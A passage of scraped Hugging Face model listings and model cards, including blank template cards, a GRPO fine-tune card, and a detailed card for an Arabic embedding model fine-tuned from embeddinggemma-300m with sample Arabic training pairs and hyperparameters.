prompt = tokenizer.apply_chat_template(
messages, tokenize=False, add_generation_prompt=True
)
response = generate(model, tokenizer, prompt=prompt, verbose=True)
```
|
onnxmodelzoo/resnetrs270_Opset17
|
onnxmodelzoo
| 2025-09-23T14:24:00Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:23:34Z |
---
language: en
license: apache-2.0
model_name: resnetrs270_Opset17.onnx
tags:
- Computer_Vision
---
|
johngreendr1/a4b976ed-2935-4a42-b78e-93ecd19c782e
|
johngreendr1
| 2025-09-23T14:23:41Z | 0 | 0 |
peft
|
[
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:tiiuae/falcon-7b",
"base_model:adapter:tiiuae/falcon-7b",
"region:us"
] | null | 2025-09-23T14:22:19Z |
---
base_model: tiiuae/falcon-7b
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.1
|
onnxmodelzoo/resnetrs200_Opset16
|
onnxmodelzoo
| 2025-09-23T14:22:46Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:22:22Z |
---
language: en
license: apache-2.0
model_name: resnetrs200_Opset16.onnx
tags:
- Computer_Vision
---
|
Stef7177/camembert-triathlon-coach-v2
|
Stef7177
| 2025-09-23T12:31:34Z | 17 | 0 |
transformers
|
[
"transformers",
"safetensors",
"camembert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-22T15:28:06Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Psix1990/Pro
|
Psix1990
| 2025-09-23T12:30:54Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T12:30:54Z |
---
license: apache-2.0
---
|
asteroid999/blockassist
|
asteroid999
| 2025-09-23T12:30:16Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"furry smooth caterpillar",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-16T23:28:49Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- furry smooth caterpillar
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
markmywords-au/document_parser_grpo_v1
|
markmywords-au
| 2025-09-23T12:29:33Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen2_5_vl",
"image-to-text",
"generated_from_trainer",
"grpo",
"trl",
"arxiv:2402.03300",
"base_model:markmywords-au/document_parser_v1",
"base_model:finetune:markmywords-au/document_parser_v1",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
image-to-text
| 2025-09-23T10:16:17Z |
---
base_model: markmywords-au/document_parser_v1
library_name: transformers
model_name: document_parser_grpo_v1
tags:
- generated_from_trainer
- grpo
- trl
licence: license
---
# Model Card for document_parser_grpo_v1
This model is a fine-tuned version of [markmywords-au/document_parser_v1](https://huggingface.co/markmywords-au/document_parser_v1).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="markmywords-au/document_parser_grpo_v1", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite GRPO as:
```bibtex
@article{shao2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
yasserrmd/arabic-gemma-300m-emb
|
yasserrmd
| 2025-09-23T12:28:59Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"gemma3_text",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:50000",
"loss:MultipleNegativesRankingLoss",
"arxiv:1908.10084",
"arxiv:1705.00652",
"base_model:google/embeddinggemma-300m",
"base_model:finetune:google/embeddinggemma-300m",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T12:28:17Z |
---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:50000
- loss:MultipleNegativesRankingLoss
base_model: google/embeddinggemma-300m
widget:
- source_sentence: ما هي معاير التنظيف المتبعة حاليًا في ليمونز آند صن أبارتمنت؟
sentences:
- 'تؤكّد هذه المنشأة استخدام المطهّرات لتنظيف المنشأة وذلك بالإضافة إلى تزويد النزلاء
بمعقّم ليدين و ارتداء معدّات الحماية الشخصية من قِبَل طاقم العمل يُرجى الملاحظة
تمّ تزويدنا بهذه المعلومات من قِبَل شركائنا '
- 'دعنا نشير إلى زاوية الميل من أعلى سارية العلم إلى أسفل التل بالرمز x. سوف نستخدم
دالة الظل لحل هذه المشكلة.أولًا، دعونا نوجد ارتفاع التل عند قاعدة سارية العلم.
يمكننا استخدام دالة الظل لزاوية الانخفاض:ظا (25 درجة) = ارتفاع التل / 100 مترارتفاع
التل = 100 * ظا(25°) ≈ 46.63 مترالآن، دعونا نفكر في المثلث الذي يتكون من قمة سارية
العلم، وأسفل سارية العلم، وأسفل التل. ارتفاع هذا المثلث هو مجموع ارتفاع سارية
العلم وارتفاع التل:الارتفاع الإجمالي = ارتفاع سارية العلم + ارتفاع التل
الارتفاع الإجمالي = 50 مترًا + 46.63 مترًا ≈ 96.63 مترًاالآن يمكننا استخدام دالة
الظل لإيجاد زاوية الميل x:tan(x) = الارتفاع الإجمالي / المسافة إلى أسفل التل
ظا(س) = 96.63 متر / 100 مترس = أركانتان (96.63 / 100)
س ≈ 44.08°وبالتالي، فإن زاوية الميل من أعلى سارية العلم إلى أسفل التل تبلغ حوالي
44.08 درجة.'
- ' ما المقصود بالسؤال باله مع التمثيل ؟ توحيد الثانى متوسط الفصل الثانى الإجابة
المقصود بالسؤال باله تعالى هو أن يطلب الشخص من أحد شيئا ما متوسلا باله ، و التمثيل
على ذلك ، مثل أسألك باله أن تساعدنى فى كذا ، أنشد باله أن تخبرنى عن كذا أو باله
عليك أن تعطينى كذا '
- source_sentence: 'هل يوجد موقف سيارات داخل الموقع في هوتل ستراوس؟ '
sentences:
- 'سؤال. مانيكس هو سائق حافلة سياحية. عليه أن يقود مسافة 55 ميلاً إلى الوجهة ثم
يعود إلى نقطة البداية بطريقة مختلفة تبعد 10 أميال. إذا كان بإمكانه القيادة لمسافة
ميل واحد لمدة دقيقتين والبقاء لمدة ساعتين في الوجهة، فكم من الوقت سيستغرق سائق
الحافلة للقيام بالجولة بأكملها في ساعات؟
إجابة. 6
ما هو المنطق خطوة بخطوة الذي يبرر هذه الإجابة؟'
- 'أجل، تُتاح خدمة صف السيارة بمعرفة النزيل مجانًا '
- أحد أكثر الخيارات شيوعاً اليوم هو ركوب سيارة أجرة أو خدمة نقل الركاب مباشرة من
سان فرانسكو إلى الفندق غالباً ما يكون هذا الخيار مجدياً من حيث التكلفة ، ولكن
يجب على الضيوف مراقبة معدلات أوقات الذروة
- source_sentence: هل يمكنك تقديم مثال لاستعلام MySQL الذي يسترد أول 10 سجلات من جدول،
مرتبة بترتيب تنازلي بناءً على خاصية معينة؟
sentences:
- شروط اتباع هذا الرجيم هي الاستمرار عليه لمدة لا تقل عن أيام، ولا يجب الاستمرار
عليه لأكثر من أيام لتجنب أي مخاطر صحية، كما يجب استشارة الطبيب قبل اتباعه لتأكد
من مدى أمانه
- نعم زيت السمسم يعمل على تطويل وتقويه الرموش لاحتوائه على المعادن والفيتامينات
- 'بالتأكيد! يمكنك استخدام استعلام MySQL التالي لتحقيق ذلك:``` SQL
اختر * من الجدول
اطلب حسب خاصية DESC
الحد 10؛
```في هذا الاستعلام، استبدل `الجدول` باسم الجدول الخاص بك، و`الخاصية` بالعمود
الذي تريد الفرز حسبه. يتم استخدام الكلمة الأساسية `DESC` لفرز السجلات بترتيب تنازلي.تسترد
عبارة `SELECT *` كافة أعمدة السجلات المحددة من الجدول. إذا كنت تريد أعمدة محددة
فقط، فيمكنك استبدال `*` بأسماء الأعمدة مفصولة بفواصل.تحدد عبارة `ORDER BY` العمود
المطلوب الفرز حسبه (`الخاصية` في هذه الحالة) وترتيب الفرز (`DESC` للتنازل).وأخيرًا،
تحدد عبارة LIMIT 10 النتيجة بالسجلات العشرة الأولى التي يتم إرجاعها بواسطة الاستعلام.باستخدام
هذا الاستعلام، سوف تتلقى أول 10 سجلات من الجدول، مرتبة بترتيب تنازلي بناءً على
الخاصية المحددة.'
- source_sentence: 'هل يوجد موقف سيارات داخل الموقع في ليفيدورا بينشن؟ '
sentences:
- 'أجل، تُتاح خدمة صف السيارة بمعرفة النزيل مجانًا '
- بع
- 'أجل، تُتاح خدمة صف السيارة بمعرفة النزيل مجانًا '
- source_sentence: أنت مساعد مفيد، تقدم دائمًا الشرح. فكر وكأنك تجيب على طفل عمره
خمس سنوات.
sentences:
- ' السعرات الحرارية في صدر الدجاج منزوع الدسم وغير مطبوخ سعر حراري '
- "أكمل الجملة التالية.شرعت ريبيكا في التجول وتجنيد أعضاء جدد لكنيسة ليندسي\nخيارات:\n\
\ * كانت ريبيكا شابة ونشطة.\n * كانت ليندسي شابة ونشطة."
- 'سأطرح عليك سؤالاً، يرجى الإجابة عليه من خلال عملية تفكير خطوة بخطوة. ماذا يمكن
أن يفعل الشخص المسافر إلى الخارج؟
خيارات:
- يصرخ على
- أشعر بالسعادة
- الشارع العرضي
- متن السفينة
- الحصول على جواز السفر'
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on google/embeddinggemma-300m
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [google/embeddinggemma-300m](https://huggingface.co/google/embeddinggemma-300m). It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [google/embeddinggemma-300m](https://huggingface.co/google/embeddinggemma-300m) <!-- at revision c5cfa06e5e282a820e85d57f7fb053207494f41d -->
- **Maximum Sequence Length:** 2048 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
<!-- - **Training Dataset:** Unknown -->
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 2048, 'do_lower_case': False, 'architecture': 'Gemma3TextModel'})
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
(2): Dense({'in_features': 768, 'out_features': 3072, 'bias': False, 'activation_function': 'torch.nn.modules.linear.Identity'})
(3): Dense({'in_features': 3072, 'out_features': 768, 'bias': False, 'activation_function': 'torch.nn.modules.linear.Identity'})
(4): Normalize()
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("yasserrmd/arabic-gemma-300m-emb")
# Run inference
queries = [
"\u0623\u0646\u062a \u0645\u0633\u0627\u0639\u062f \u0645\u0641\u064a\u062f\u060c \u062a\u0642\u062f\u0645 \u062f\u0627\u0626\u0645\u064b\u0627 \u0627\u0644\u0634\u0631\u062d. \u0641\u0643\u0631 \u0648\u0643\u0623\u0646\u0643 \u062a\u062c\u064a\u0628 \u0639\u0644\u0649 \u0637\u0641\u0644 \u0639\u0645\u0631\u0647 \u062e\u0645\u0633 \u0633\u0646\u0648\u0627\u062a.",
]
documents = [
'أكمل الجملة التالية.شرعت ريبيكا في التجول وتجنيد أعضاء جدد لكنيسة ليندسي\nخيارات:\n * كانت ريبيكا شابة ونشطة.\n * كانت ليندسي شابة ونشطة.',
'سأطرح عليك سؤالاً، يرجى الإجابة عليه من خلال عملية تفكير خطوة بخطوة. ماذا يمكن أن يفعل الشخص المسافر إلى الخارج؟\nخيارات:\n- يصرخ على\n- أشعر بالسعادة\n- الشارع العرضي\n- متن السفينة\n- الحصول على جواز السفر',
' السعرات الحرارية في صدر الدجاج منزوع الدسم وغير مطبوخ سعر حراري ',
]
query_embeddings = model.encode_query(queries)
document_embeddings = model.encode_document(documents)
print(query_embeddings.shape, document_embeddings.shape)
# [1, 768] [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(query_embeddings, document_embeddings)
print(similarities)
# tensor([[0.9963, 0.9945, 0.9601]])
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### Unnamed Dataset
* Size: 50,000 training samples
* Columns: <code>sentence_0</code> and <code>sentence_1</code>
* Approximate statistics based on the first 1000 samples:
| | sentence_0 | sentence_1 |
|:--------|:-----------------------------------------------------------------------------------|:------------------------------------------------------------------------------------|
| type | string | string |
| details | <ul><li>min: 5 tokens</li><li>mean: 30.79 tokens</li><li>max: 344 tokens</li></ul> | <ul><li>min: 3 tokens</li><li>mean: 82.22 tokens</li><li>max: 1317 tokens</li></ul> |
* Samples:
| sentence_0 | sentence_1 |
|:--------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>اصعب شعور ان تعلمي بخيانة زوجك ولا تستطيعي المواجه</code> | <code>اهلا بك سيدتي ان زوجك يحبك وانت رأيت ذلك بعينك والفتاة هي التي تلاحق زوجك وليس هو ويقوم بشطب الحديث ربما كي لا يضايقك سيدتي لذا لا تحاولي ان تكبري الامر فزوجك لا يتمادى بل يحبك وبما انه لا يفتح المجال أمامها فلن تستطيع الوصول اليه</code> |
| <code>هل يوجد مسبح في هذا الفندق؟</code> | <code>لا يضم ذا إيليزيوم إسطنبول هوتل آند سبا مسبحاً لنزلاء </code> |
| <code>### أين تجد أفضل أماكن الإقامة في أوبيرشواباخ?<br><br></code> | <code>لدينا أماكن لإقامة في أوبيرشواباخ بأسعار تبدأ من اختر من بين عروضنا التي يبلغ عدها واحصل على تخفيضات تصل إلى ستجد أدناه عد أماكن الإقامة الموجودة لدينا في أوبيرشواباخ والمنطقة المجاورة، مُصنّفةً حسب عد النجوم • من أماكن الإقامة بتصنيف نجوم بأسعار تبدأ من في اليلة • من أماكن الإقامة بتصنيف نجوم بأسعار تبدأ من في اليلة • من أماكن الإقامة بتصنيف نجمتين بأسعار تبدأ من في اليلة </code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"gather_across_devices": false
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `per_device_train_batch_size`: 2
- `per_device_eval_batch_size`: 2
- `num_train_epochs`: 1
- `multi_dataset_batch_sampler`: round_robin
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: no
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 2
- `per_device_eval_batch_size`: 2
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 5e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.0
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: False
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `parallelism_config`: None
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: batch_sampler
- `multi_dataset_batch_sampler`: round_robin
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
### Training Logs
| Epoch | Step | Training Loss |
|:-----:|:-----:|:-------------:|
| 0.02 | 500 | 0.2418 |
| 0.04 | 1000 | 0.196 |
| 0.06 | 1500 | 0.2175 |
| 0.08 | 2000 | 0.2322 |
| 0.1 | 2500 | 0.5057 |
| 0.12 | 3000 | 0.8355 |
| 0.14 | 3500 | 0.7225 |
| 0.16 | 4000 | 0.8465 |
| 0.18 | 4500 | 0.7221 |
| 0.2 | 5000 | 0.6119 |
| 0.22 | 5500 | 0.5523 |
| 0.24 | 6000 | 0.6402 |
| 0.26 | 6500 | 0.6833 |
| 0.28 | 7000 | 0.4836 |
| 0.3 | 7500 | 0.5627 |
| 0.32 | 8000 | 0.6542 |
| 0.34 | 8500 | 0.5496 |
| 0.36 | 9000 | 0.6457 |
| 0.38 | 9500 | 0.6542 |
| 0.4 | 10000 | 0.4788 |
| 0.42 | 10500 | 0.458 |
| 0.44 | 11000 | 0.447 |
| 0.46 | 11500 | 0.5309 |
| 0.48 | 12000 | 0.4494 |
| 0.5 | 12500 | 0.4572 |
| 0.52 | 13000 | 0.4867 |
### Framework Versions
- Python: 3.12.11
- Sentence Transformers: 5.1.1
- Transformers: 4.56.2
- PyTorch: 2.8.0+cu128
- Accelerate: 1.10.1
- Datasets: 4.0.0
- Tokenizers: 0.22.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### MultipleNegativesRankingLoss
```bibtex
@misc{henderson2017efficient,
title={Efficient Natural Language Response Suggestion for Smart Reply},
author={Matthew Henderson and Rami Al-Rfou and Brian Strope and Yun-hsuan Sung and Laszlo Lukacs and Ruiqi Guo and Sanjiv Kumar and Balint Miklos and Ray Kurzweil},
year={2017},
eprint={1705.00652},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
